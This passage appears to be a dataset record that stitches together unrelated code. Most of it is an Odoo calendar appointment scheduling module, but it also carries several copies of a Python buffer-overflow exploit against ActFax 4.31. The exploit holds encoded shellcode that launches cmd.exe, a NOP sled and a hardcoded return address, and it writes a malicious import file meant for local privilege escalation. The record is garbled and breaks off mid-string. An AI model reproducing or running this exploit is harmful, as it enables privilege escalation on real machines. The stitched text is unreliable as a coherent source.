last_day.replace(hour=23, minute=59, second=59)\n )), ('stop', '>', fields.Datetime.to_string(\n first_day.replace(hour=0, minute=0, second=0)))])\n if is_calendar_available(slot, meetings[emp_pos], emp):\n slot['employee_id'] = emp\n break\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n ('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-5": "# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport calendar as cal\nimport random\nimport pytz\nfrom datetime import datetime, timedelta, time\nfrom dateutil import rrule\nfrom dateutil.relativedelta import relativedelta\nfrom babel.dates import format_datetime\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools.misc import get_lang\nfrom odoo.addons.base.models.res_partner import _tz_get\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom odoo.exceptions import ValidationError\n\n\nclass CalendarAppointmentType(models.Model):\n _name = \"calendar.appointment.type\"\n _description = \"Online Appointment Type\"\n _inherit = ['mail.thread', \"website.seo.metadata\", 'website.published.mixin']\n _order = \"sequence\"\n\n sequence = fields.Integer('Sequence')\n name = fields.Char('Appointment Type', required=True, translate=True)\n min_schedule_hours = fields.Float('Schedule before (hours)', required=True, default=1.0)\n max_schedule_days = fields.Integer('Schedule not after (days)', required=True, default=15)\n min_cancellation_hours = fields.Float('Cancel Before (hours)', required=True, default=1.0)\n appointment_duration = fields.Float('Appointment Duration', required=True, default=1.0)\n\n reminder_ids = fields.Many2many('calendar.alarm', string=\"Reminders\")\n location = fields.Char('Location', help=\"Location of the appointments\")\n message_confirmation = fields.Html('Confirmation Message', translate=True)\n message_intro = fields.Html('Introduction Message', translate=True)\n\n country_ids = fields.Many2many(\n 'res.country', 'website_calendar_type_country_rel', string='Restrict Countries',\n help=\"Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries\")\n question_ids = fields.One2many('calendar.appointment.question', 'appointment_type_id', string='Questions', copy=True)\n\n slot_ids = fields.One2many('calendar.appointment.slot', 'appointment_type_id', 'Availabilities', copy=True)\n appointment_tz = fields.Selection(\n _tz_get, string='Timezone', required=True, default=lambda self: self.env.user.tz,\n help=\"Timezone where appointment take place\")\n employee_ids = fields.Many2many('hr.employee', 'website_calendar_type_employee_rel', domain=[('user_id', '!=', False)], string='Employees')\n assignation_method = fields.Selection([\n ('random', 'Random'),\n ('chosen', 'Chosen by the Customer')], string='Assignment Method', default='random',\n help=\"How employees will be assigned to meetings customers book on your website.\")\n appointment_count = fields.Integer('# Appointments', compute='_compute_appointment_count')\n\n def _compute_appointment_count(self):\n meeting_data = self.env['calendar.event'].read_group([('appointment_type_id', 'in', self.ids)], ['appointment_type_id'], ['appointment_type_id'])\n mapped_data = {m['appointment_type_id'][0]: m['appointment_type_id_count'] for m in meeting_data}\n for appointment_type in self:\n appointment_type.appointment_count = mapped_data.get(appointment_type.id, 0)\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id :\n appointment_type.website_url = '/calendar/%s/appointment' % (slug(appointment_type),)\n\n @api.returns('self', lambda value: value.id)\n def copy(self, default=None):\n default = default or {}\n default['name'] = self.name + _(' (copy)')\n return super(CalendarAppointmentType, self).copy(default=default)\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env[\"ir.actions.actions\"]._for_xml_id(\"calendar.action_calendar_event\")\n action['context'] = {\n 'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id\n }\n return action\n\n # --------------------------------------\n # Slots Generation\n # --------------------------------------\n\n def _slots_generate(self, first_day, last_day, timezone):\n \"\"\" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)\n between first_day and last_day (datetimes in appointment timezone)\n\n :return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},\n ... ]\n \"\"\"\n def append_slot(day, slot):\n local_start = appt_tz.localize(datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))))\n local_end = appt_tz.localize(\n datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))) + relativedelta(hours=self.appointment_duration))\n slots.append({\n self.appointment_tz: (\n local_start,\n local_end,\n ),\n timezone: (\n local_start.astimezone(requested_tz),\n local_end.astimezone(requested_tz),\n ),\n 'UTC': (\n local_start.astimezone(pytz.UTC).replace(tzinfo=None),\n local_end.astimezone(pytz.UTC).replace(tzinfo=None),\n ),\n 'slot': slot,\n })\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n\n slots = []\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == first_day.isoweekday()):\n if slot.hour > first_day.hour + first_day.minute / 60.0:\n append_slot(first_day.date(), slot)\n slot_weekday = [int(weekday) - 1 for weekday in self.slot_ids.mapped('weekday')]\n for day in rrule.rrule(rrule.DAILY,\n dtstart=first_day.date() + timedelta(days=1),\n until=last_day.date(),\n byweekday=slot_weekday):\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == day.isoweekday()):\n append_slot(day, slot)\n return slots\n\n def _slots_available(self, slots, first_day, last_day, employee=None):\n \"\"\" Fills the slot stucture with an available employee\n\n :param slots: slots structure generated by _slots_generate\n :param first_day: start datetime in UTC\n :param last_day: end datetime in UTC\n :param employee: if set, only consider this employee\n if not set, consider all employees assigned to this appointment type\n \"\"\"\n\n def is_work_available(start_dt, end_dt, intervals):\n \"\"\" check if the slot is contained in the employee's work hours (defined by intervals)\n \"\"\"\n def find_start_index():\n \"\"\" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt\n \"\"\"\n def recursive_find_index(lower_bound, upper_bound):\n if upper_bound - lower_bound <= 1:\n if intervals[upper_bound][0] <= start_dt:\n return upper_bound\n return lower_bound\n index = (upper_bound + lower_bound) // 2\n if intervals[index][0] <= start_dt:\n return recursive_find_index(index, upper_bound)\n else:\n return recursive_find_index(lower_bound, index)\n\n if start_dt <= intervals[0][0] - tolerance:\n return -1\n if end_dt >= intervals[-1][1] + tolerance:\n return -1\n return recursive_find_index(0, len(intervals) - 1)\n\n if not intervals:\n return False\n\n tolerance = timedelta(minutes=1)\n start_index = find_start_index()\n if start_index != -1:\n for index in range(start_index, len(intervals)):\n if intervals[index][1] >= end_dt - tolerance:\n return True\n if len(intervals) == index + 1 or intervals[index + 1][0] - intervals[index][1] > tolerance:\n return False\n return False\n\n def is_calendar_available(slot, events, employee):\n \"\"\" Returns True if the given slot doesn't collide with given events for the employee\n \"\"\"\n start_dt = slot['UTC'][0]\n end_dt = slot['UTC'][1]\n\n event_in_scope = lambda ev: (\n fields.Date.to_date(ev.start) <= fields.Date.to_date(end_dt)\n and fields.Date.to_date(ev.stop) >= fields.Date.to_date(start_dt)\n )\n\n for ev in events.filtered(event_in_scope):\n if ev.allday:\n # allday events are considered to take the whole day in the related employee's timezone\n event_tz = pytz.timezone(ev.event_tz or employee.user_id.tz or self.env.user.tz or slot['slot'].appointment_type_id.appointment_tz or 'UTC')\n ev_start_dt = datetime.combine(fields.Date.from_string(ev.start_date), time.min)\n ev_stop_dt = datetime.combine(fields.Date.from_string(ev.stop_date), time.max)\n ev_start_dt = event_tz.localize(ev_start_dt).astimezone(pytz.UTC).replace(tzinfo=None)\n ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz.UTC).replace(tzinfo=None)\n if ev_start_dt < end_dt and ev_stop_dt > start_dt:\n return False\n elif fields.Datetime.to_datetime(ev.start) < end_dt and fields.Datetime.to_datetime(ev.stop) > start_dt:\n return False\n return True\n\n workhours = {}\n meetings = {}\n\n # With context will be used in resource.calendar to force the referential user\n # for work interval computing to the *user linked to the employee*\n available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in (employee or self.employee_ids)]\n random.shuffle(available_employees)\n for slot in slots:\n for emp_pos, emp in enumerate(available_employees):\n if emp_pos not in workhours:\n workhours[emp_pos] = [\n (interval[0].astimezone(pytz.UTC).replace(tzinfo=None),\n interval[1].astimezone(pytz.UTC).replace(tzinfo=None))\n for interval in emp.resource_calendar_id._work_intervals_batch(\n first_day, last_day, resources=emp.resource_id,\n )[emp.resource_id.id]\n ]\n\n if is_work_available(slot['UTC'][0], slot['UTC'][1], workhours[emp_pos]):\n if emp_pos not in meetings:\n # note: no check is made on the attendee's status (accepted/declined/...)\n meetings[emp_pos] = self.env['calendar.event'].search([\n ('partner_ids.user_ids', '=', emp.user_id.id),\n ('start', '<', fields.Datetime.to_string(last_day.replace(hour=23, minute=59, second=59))),\n ('stop', '>', fields.Datetime.to_string(first_day.replace(hour=0, minute=0, second=0)))\n ])\n\n if is_calendar_available(slot, meetings[emp_pos], emp):\n slot['employee_id'] = emp\n break\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(days=self.max_schedule_days))\n\n # Compute available slots (ordered)\n slots = self._slots_generate(first_day.astimezone(appt_tz), last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC), last_day.astimezone(pytz.UTC), employee)\n\n # Compute calendar rendering and inject available slots\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n # slots are ordered, so check all unprocessed slots from until > day\n while slots and (slots[0][timezone][0].date() <= day):\n if (slots[0][timezone][0].date() == day) and ('employee_id' in slots[0]):\n today_slots.append({\n 'employee_id': slots[0]['employee_id'].id,\n 'datetime': slots[0][timezone][0].strftime('%Y-%m-%d %H:%M:%S'),\n 'hours': slots[0][timezone][0].strftime('%H:%M')\n })\n slots.pop(0)\n dates[week_index][day_index] = {\n 'day': day,\n 'slots': today_slots,\n 'mute_cls': mute_cls,\n 'weekend_cls': weekend_cls,\n 'today_cls': today_cls\n }\n\n months.append({\n 'month': format_datetime(start, 'MMMM Y', locale=get_lang(self.env).code),\n 'weeks': dates\n })\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = \"calendar.appointment.slot\"\n _description = \"Online Appointment : Time Slot\"\n _rec_name = \"weekday\"\n _order = \"weekday, hour\"\n\n appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([\n ('1', 'Monday'),\n ('2', 'Tuesday'),\n ('3', 'Wednesday'),\n ('4', 'Thursday'),\n ('5', 'Friday'),\n ('6', 'Saturday'),\n ('7', 'Sunday'),\n ], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.00 or slot.hour >= 24.00 for slot in self):\n raise ValidationError(_(\"Please enter a valid hour between 0:00 and 24:00 for your slots.\"))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, \"%s, %02d:%02d\" % (weekdays.get(slot.weekday), int(slot.hour), int(round((slot.hour % 1) * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = \"calendar.appointment.question\"\n _description = \"Online Appointment : Questions\"\n _order = \"sequence\"\n\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete=\"cascade\")\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([\n ('char', 'Single line text'),\n ('text', 'Multi-line text'),\n ('select', 'Dropdown (one answer)'),\n ('radio', 'Radio (one answer)'),\n ('checkbox', 'Checkboxes (multiple answers)')], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer', 'calendar_appointment_question_answer_rel', 'question_id', 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = \"calendar.appointment.answer\"\n _description = \"Online Appointment : Answers\"\n\n question_id = fields.Many2many('calendar.appointment.question', 'calendar_appointment_question_answer_rel', 'answer_id', 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-ids": [
7,
10,
12,
18,
19
]
}
|
[
7,
10,
12,
18,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
<|reserved_special_token_1|>
sc = (
'\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'
)
frontpad = '\x90' * 10
eip = '"\x1b@\x00'
backpad = '\x90' * 6000
buff = frontpad + sc + '\x90' * (502 - len(sc)) + eip + backpad
f = open('pwnag3.exp', 'w')
f.write(
'User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\tPredefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\tCoverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\tPrinter Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\tEmail Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\tExport Incoming\tExport-Path\tMark as Read\r\n'
+ buff + '\r\n')
f.close()
<|reserved_special_token_1|>
#!/usr/bin/python
#Title: ActFax 4.31 Local Privilege Escalation Exploit
#Author: Craig Freyman (@cd1zz)
#Discovered: July 10, 2012
#Vendor Notified: June 12, 2012
#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html
#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c
#[*] x86/alpha_upper succeeded with size 466 (iteration=1)
sc = (
"\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a"
"\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a"
"\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c"
"\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34"
"\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b"
"\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43"
"\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58"
"\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52"
"\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47"
"\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e"
"\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51"
"\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56"
"\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f"
"\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50"
"\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47"
"\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30"
"\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30"
"\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54"
"\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36"
"\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b"
"\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a"
"\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f"
"\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c"
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e"
"\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d"
"\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d"
"\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35"
"\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e"
"\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45"
"\x35\x33\x30\x41\x41")
frontpad = "\x90" * 10
eip = "\x22\x1b\x40\x00" #00401B22 RETN actfax.exe
backpad = "\x90" * 6000
buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad
f = open("pwnag3.exp", "w")
f.write(
"User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
"Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
"Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
"Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
"Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
"Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a")
f.close()
|
flexible
|
{
"blob_id": "1b7048ef17b3512b9944ce7e197db27f4fd1aed0",
"index": 1687,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n",
"step-3": "sc = (\n '\\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'\n )\nfrontpad = '\\x90' * 10\neip = '\"\\x1b@\\x00'\nbackpad = '\\x90' * 6000\nbuff = frontpad + sc + '\\x90' * (502 - len(sc)) + eip + backpad\nf = open('pwnag3.exp', 'w')\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n",
"step-4": "#!/usr/bin/python\r\n#Title: ActFax 4.31 Local Privilege Escalation Exploit\r\n#Author: Craig Freyman (@cd1zz)\r\n#Discovered: July 10, 2012\r\n#Vendor Notified: June 12, 2012\r\n#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html\r\n\r\n#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c\r\n#[*] x86/alpha_upper succeeded with size 466 (iteration=1)\r\nsc = (\r\n\"\\x89\\xe5\\xdb\\xce\\xd9\\x75\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\"\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x5a\"\r\n\"\\x48\\x4d\\x59\\x45\\x50\\x35\\x50\\x53\\x30\\x43\\x50\\x4d\\x59\\x4a\"\r\n\"\\x45\\x56\\x51\\x48\\x52\\x55\\x34\\x4c\\x4b\\x36\\x32\\x50\\x30\\x4c\"\r\n\"\\x4b\\x36\\x32\\x44\\x4c\\x4c\\x4b\\x30\\x52\\x52\\x34\\x4c\\x4b\\x34\"\r\n\"\\x32\\x56\\x48\\x34\\x4f\\x38\\x37\\x51\\x5a\\x37\\x56\\x46\\x51\\x4b\"\r\n\"\\x4f\\x46\\x51\\x39\\x50\\x4e\\x4c\\x47\\x4c\\x35\\x31\\x43\\x4c\\x43\"\r\n\"\\x32\\x36\\x4c\\x31\\x30\\x49\\x51\\x48\\x4f\\x34\\x4d\\x55\\x51\\x58\"\r\n\"\\x47\\x4a\\x42\\x4c\\x30\\x30\\x52\\x50\\x57\\x4c\\x4b\\x50\\x52\\x52\"\r\n\"\\x30\\x4c\\x4b\\x37\\x32\\x47\\x4c\